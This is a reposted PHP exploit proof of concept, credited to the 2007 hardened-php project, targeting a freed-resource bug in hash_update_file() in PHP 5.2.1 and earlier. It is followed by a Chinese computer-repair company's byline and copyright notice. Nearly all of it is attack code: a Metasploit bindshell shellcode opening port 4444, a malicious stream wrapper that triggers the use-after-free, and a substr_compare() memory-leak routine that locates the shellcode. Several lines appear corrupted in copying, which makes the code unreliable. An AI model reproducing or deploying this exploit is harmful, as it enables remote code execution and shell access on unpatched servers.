PHP <= 5.2.1 hash_update_file() Freed Resource Us
////////////////////////////////////////////////////////////////////////
// _ _ _ _ ___ _ _ ___ //
// | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ \| || || _ \ //
// | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___|| _/| __ || _/ //
// |_||_|\__,_||_| \__,_|\___||_||_|\___|\__,_| |_| |_||_||_| //
// //
// proof of concept code from the hardened-php project //
// (c) copyright 2007 stefan esser //
// //
////////////////////////////////////////////////////////////////////////
// php hash_update_file() freed resource usage exploit //
////////////////////////////////////////////////////////////////////////
// this is meant as a protection against remote file inclusion.
die("remove this line");
// linux x86 bindshell on port 4444 from metasploit
$shellcode = "\x29\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x46".
"\x32\x3c\xe5\x83\xeb\xfc\xe2\xf4\x77\xe9\x6f\xa6\x15\x58\x3e\x8f".
"\x20\x6a\xa5\x6c\xa7\xff\xbc\x73\x05\x60\x5a\x8d\x57\x6e\x5a\xb6".
"\xcf\xd3\x56\x83\x1e\x62\x6d\xb3\xcf\xd3\xf1\x65\xf6\x54\xed\x06".
"\x8b\xb2\x6e\xb7\x10\x71\xb5\x04\xf6\x54\xf1\x65\xd5\x58\x3e\xbc".
"\xf6\x0d\xf1\x65\x0f\x4b\xc5\x55\x4d\x60\x54\xca\x69\x41\x54\x8d".
"\x69\x50\x55\x8b\xcf\xd1\x6e\xb6\xcf\xd3\xf1\x65";
define("offset", pack("l",findoffset()));
class attackstream {
function stream_open($path, $mode, $options, &$opened_path)
{
return true;
}
function stream_read($count)
{
hash_final($globals['hid'], true);
$globals['aaaaaaaaaaaaaaaaaaaaaa'] = str_repeat(offset, 3);
return "a";
}
function stream_eof()
{
return true;
}
function stream_seek($offset, $whence)
{
return false;
}
}
stream_wrapper_register("attack", "attackstream") or die("failed to register protocol");
$hid = hash_init('md5');
hash_update_file($hid, "attack://nothing");
// this function uses the substr_compare() vulnerability
// to get the offset.
function findoffset()
{
global $offset_1, $offset_2, $shellcode;
// we need to not clear these variables,
// otherwise the heap is too segmented
global $memdump, $d, $arr;
$sizeofhashtable = 39;
$maxlong = 0x7fffffff;
// signature of a big endian hashtable of size 256 with 1 element
$search = "\x00\x01\x00\x00\xff\x00\x00\x00\x01\x00\x00\x00";
$memdump = str_repeat("a", 8192);
for ($i=0; $i<400; $i++) {
$d[$i]=array();
}
unset($d[350]);
$x = str_repeat("\x01", $sizeofhashtable);
unset($d[351]);
unset($d[352]);
$arr = array();
for ($i=0; $i<129; $i++) { $arr[$i] = 1; }
$arr[$shellcode] = 1;
for ($i=0; $i<129; $i++) { unset($arr[$i]); }
// if the libc memcmp leaks the information use it
// otherwise we only get a case insensitive memdump
$b = substr_compare(chr(65),chr(0),0,1,false) != 65;
for ($i=0; $i<8192; $i++) {
$y = substr_compare($x, chr(0), $i+1, $maxlong, $b);
$y = substr_compare($x, chr(1), $i+1, $maxlong, $b);
if ($y-$y == 1 || $y-$y==1){
$y = chr($y);
if ($b && strtoupper($y)!=$y) {
if (substr_compare($x, $y, $i+1, $maxlong, false)==-1) {
$y = strtoupper($y);
}
}
$memdump[$i] = $y;
} else {
$y = substr_compare($x, chr(1), $i+1, $maxlong, $b);
$y = substr_compare($x, chr(2), $i+1, $maxlong, $b);
if ($y-$y != 1 && $y-$y!=1){
$memdump[$i] = chr(1);
} else {
$memdump[$i] = chr(0);
}
}
}
// search hashtable to get the shellcode offset
$pos_hashtable = strpos($memdump, $search);
if ($pos_hashtable == 0) {
die ("unable to find the offset");
}
$addr = substr($memdump, $pos_hashtable+6*4, 4);
$addr = unpack("l", $addr);
return ($addr[1] + 32);
}
?>
l
- 文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明:原创作品,允许转载,转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。
TAG:
|
评论加载中...
|
